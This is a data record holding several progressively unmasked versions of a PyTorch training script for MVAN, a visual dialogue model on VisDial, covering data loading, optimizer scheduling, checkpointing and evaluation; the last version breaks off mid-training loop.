"step-2": "<mask token>\n\n\nclass MVAN(object):\n <mask token>\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = 
os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n 
optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-3": "<mask token>\n\n\nclass MVAN(object):\n\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n self.device = torch.device('cuda', self.hparams.gpu_ids[0]\n ) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')\n setproctitle(hparams.dataset_version + '_' + hparams.model_name +\n '_' + str(hparams.random_seed[0]))\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 
'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n 
.param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-4": "<mask token>\nos.environ['CUDA_VISIBLE_DEVICES'] = '0,1'\n<mask token>\n\n\nclass MVAN(object):\n\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n self.device = torch.device('cuda', self.hparams.gpu_ids[0]\n ) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')\n setproctitle(hparams.dataset_version + '_' + hparams.model_name +\n '_' + str(hparams.random_seed[0]))\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n 
return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n 
global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-5": "import os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1\"\nimport logging\nimport itertools\n\nimport torch\nfrom torch import nn, optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom tqdm import tqdm\nfrom setproctitle import setproctitle\nfrom bisect import bisect\n\nfrom datetime import datetime\nimport numpy as np\n\nfrom data.dataset import VisDialDataset\nfrom visdial.encoders import Encoder\nfrom visdial.decoders import Decoder\nfrom visdial.model import EncoderDecoderModel\nfrom visdial.utils.checkpointing import CheckpointManager, load_checkpoint\n\nfrom single_evaluation import Evaluation\n\nclass MVAN(object):\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n self.device = (\n torch.device(\"cuda\", self.hparams.gpu_ids[0])\n if self.hparams.gpu_ids[0] >= 0\n else torch.device(\"cpu\")\n )\n setproctitle(hparams.dataset_version + '_' + hparams.model_name + '_' + str(hparams.random_seed[0]))\n\n # def _build_data_process(self):\n def _build_dataloader(self):\n # =============================================================================\n # SETUP DATASET, DATALOADER\n # =============================================================================\n old_split = \"train\" if self.hparams.dataset_version == \"0.9\" else None\n self.train_dataset = VisDialDataset(\n self.hparams,\n overfit=self.hparams.overfit,\n split=\"train\",\n old_split = old_split\n )\n\n collate_fn = None\n if \"dan\" in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n\n self.train_dataloader = DataLoader(\n self.train_dataset,\n batch_size=self.hparams.train_batch_size,\n num_workers=self.hparams.cpu_workers,\n shuffle=True,\n drop_last=True,\n collate_fn=collate_fn,\n )\n\n print(\"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\")\n\n def _build_model(self):\n\n # =============================================================================\n # MODEL : Encoder, Decoder\n # =============================================================================\n\n print('\\t* Building model...')\n # Pass vocabulary to construct Embedding layer.\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n\n print(\"Encoder: {}\".format(self.hparams.encoder))\n print(\"Decoder: {}\".format(self.hparams.decoder))\n\n # New: Initializing word_embed using GloVe\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.hparams.glove_npy))\n print(\"Loaded glove vectors from {}\".format(self.hparams.glove_npy))\n # Share word embedding between encoder and decoder.\n decoder.word_embed = encoder.word_embed\n\n # Wrap encoder and decoder in a model.\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n # Use Multi-GPUs\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n\n # 
=============================================================================\n # CRITERION\n # =============================================================================\n if \"disc\" in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n\n elif \"gen\" in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.train_dataset.vocabulary.PAD_INDEX)\n\n # Total Iterations -> for learning rate scheduler\n if self.hparams.training_splits == \"trainval\":\n self.iterations = (len(self.train_dataset) + len(self.valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset) // self.hparams.virtual_batch_size\n\n # =============================================================================\n # OPTIMIZER, SCHEDULER\n # =============================================================================\n\n def lr_lambda_fun(current_iteration: int) -> float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.lr_gamma2, idx)\n return return_val\n\n if self.hparams.lr_scheduler == \"LambdaLR\":\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer, lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(\n self.model, self.optimizer, self.save_dirpath, hparams=self.hparams\n )\n\n # If loading from checkpoint, adjust start epoch and load parameters.\n if self.hparams.load_pthpath == \"\":\n self.start_epoch = 1\n else:\n # \"path/to/checkpoint_xx.pth\" -> xx\n self.start_epoch = int(self.hparams.load_pthpath.split(\"_\")[-1][:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print(\"Loaded model from {}\".format(self.hparams.load_pthpath))\n\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def 
_loss_fn(self, epoch, batch, output):\n target = (batch[\"ans_ind\"] if \"disc\" in self.hparams.decoder else batch[\"ans_out\"])\n batch_loss = self.criterion(output.view(-1, output.size(-1)), target.view(-1).to(self.device))\n\n return batch_loss\n\n def train(self):\n\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n\n # Evaluation Setup\n evaluation = Evaluation(self.hparams, model=self.model, split=\"val\")\n\n # Forever increasing counter to keep track of iterations (for tensorboard log).\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n\n running_loss = 0.0 # New\n train_begin = datetime.utcnow() # New\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n # -------------------------------------------------------------------------\n # ON EPOCH START (combine dataloaders if training on train + val)\n # -------------------------------------------------------------------------\n combined_dataloader = itertools.chain(self.train_dataloader)\n\n print(f\"\\nTraining for epoch {epoch}:\", \"Total Iter:\", self.iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0 # taesun New\n\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n\n accumulate_batch += batch[\"img_ids\"].shape[0]\n if self.hparams.virtual_batch_size == accumulate_batch \\\n or i == (len(self.train_dataset) // self.hparams.train_batch_size): # last batch\n\n self.optimizer.step()\n\n # --------------------------------------------------------------------\n # Update 